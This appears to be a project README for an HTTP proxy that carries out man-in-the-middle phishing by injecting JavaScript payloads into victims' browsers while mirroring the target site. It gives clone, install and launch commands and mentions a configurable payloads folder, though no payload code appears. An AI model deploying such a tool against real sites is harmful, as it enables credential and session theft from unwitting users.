An HTTP proxy designed to perform MITM phishing attacks, allowing users to inject JavaScript payloads into the victim's browser in the background, while displaying the live content of the target domain used to attack the victim.
The project is still under development, and any contributions are welcome. There are currently some limitations to Cloudflare DDoS protection pages and other related services, but many patches will be coming soon.
- Install project:
gh repo clone irc-glory/evil-proxy
cd evil-proxy
- Install modules:
pip install -r requirements.txt
- Launch tool:
python main.py
(or)python main.py <target> <host> <port>
TIP: To edit, remove or add a payload, go to the proxy directory, and configure them from the payloads folder as you wish.
If you find my work valuable, you can show your support by sponsoring me. Your contribution will help me maintain and improve my projects, and it will encourage me to create more useful content.
Thank you to the following people for their support: